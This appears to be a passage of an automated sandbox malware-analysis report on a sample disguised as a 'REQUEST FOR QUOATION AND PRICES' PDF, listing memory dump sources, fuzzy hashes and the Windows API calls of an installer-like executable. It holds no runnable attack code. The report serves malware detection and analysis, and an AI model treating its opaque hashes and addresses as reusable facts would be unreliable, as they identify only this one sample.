                                                                                                                                  • Instruction Fuzzy Hash: C5C1B174E10218CFDB54DFA5D994BADBBB2BF89301F1080A9D408AB365DB349E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 15b31c757fea081433d9e5ff6659dde565a8a9c477cd1825dab4097e106d158c
                                                                                                                                  • Instruction ID: cb1f3dba02156b7bf137317bd910cb800265081fff7affb936750b0d992d434d
                                                                                                                                  • Opcode Fuzzy Hash: 15b31c757fea081433d9e5ff6659dde565a8a9c477cd1825dab4097e106d158c
                                                                                                                                  • Instruction Fuzzy Hash: D1C1BF74E00218CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 096882091d3b03f1d52c24a5146ce1198f07ae2b93f25430e8f31fd21b8f37be
                                                                                                                                  • Instruction ID: 50b2c07c0071f03ac09b62affd66c385401b0d61079fd1ded57cfcc3074cf187
                                                                                                                                  • Opcode Fuzzy Hash: 096882091d3b03f1d52c24a5146ce1198f07ae2b93f25430e8f31fd21b8f37be
                                                                                                                                  • Instruction Fuzzy Hash: D2C1C074E10218CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a40d23e4bc197a4ba0460c820e43471ba63ee16fb1d5cd4f0bd61658b0d35f8d
                                                                                                                                  • Instruction ID: e039757f02bf1bc9c230fa1ee1ad5fdd3b31ff62454e744d63e3fa99f363b102
                                                                                                                                  • Opcode Fuzzy Hash: a40d23e4bc197a4ba0460c820e43471ba63ee16fb1d5cd4f0bd61658b0d35f8d
                                                                                                                                  • Instruction Fuzzy Hash: 11C1C074E00218CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e0c8e83012f0ae7b7e6ad177582e3d4026cd867fce23cde65646a8627c9378c8
                                                                                                                                  • Instruction ID: 32ea54527125102ac8ab83d48d61fc3dfe64fd0107348424f62dbe5afb9c9eff
                                                                                                                                  • Opcode Fuzzy Hash: e0c8e83012f0ae7b7e6ad177582e3d4026cd867fce23cde65646a8627c9378c8
                                                                                                                                  • Instruction Fuzzy Hash: 15A19B74A01228CFDB64DF64C994BDABBB2BF4A301F5085EAD40DA7260DB319E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8895aed2e2d03db4fb2b7c755cf5e1e26f66621f419918cebfbea7ee0071aeda
                                                                                                                                  • Instruction ID: 003d7599ead7e600c5792773914fbe7a6bc9a87e69ce115655d4a66f169f2007
                                                                                                                                  • Opcode Fuzzy Hash: 8895aed2e2d03db4fb2b7c755cf5e1e26f66621f419918cebfbea7ee0071aeda
                                                                                                                                  • Instruction Fuzzy Hash: D6519E74A41228CFDB64DF24C894BEAB7B2BB4A305F5085EAD40AA7350DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ae96850f3bbc95e20739429d985340be4fd80dc169efaefd6407cd9a2ac9fa90
                                                                                                                                  • Instruction ID: d38b1f2131ad1d25ea7d7f02aa3ffb65dee5fa2233bffa84db6788958f48c183
                                                                                                                                  • Opcode Fuzzy Hash: ae96850f3bbc95e20739429d985340be4fd80dc169efaefd6407cd9a2ac9fa90
                                                                                                                                  • Instruction Fuzzy Hash: 34D06774D846298BCF51DF6898506ECB770AB9A311F0024A5808CA7110D7749A949A56
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                    • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                  • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                  • CloseClipboard.USER32 ref: 00405676
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {
                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                  • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                  • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                  • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                  • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                  • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 184305955-0
                                                                                                                                  • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                  • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                  • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                  • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                  • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                  • String ID: -B@$N$open
                                                                                                                                  • API String ID: 3615053054-1057335957
                                                                                                                                  • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                  • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                  • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                  • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                                  • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                                                  • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                  • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                  • API String ID: 1975747703-1115850852
                                                                                                                                  • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                  • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                  • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                  • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                  • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                  • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                  • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                  • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                  • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                  • API String ID: 222337774-899692902
                                                                                                                                  • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                  • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                  • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                  • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                  • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                  • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                    • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                    • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                    • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
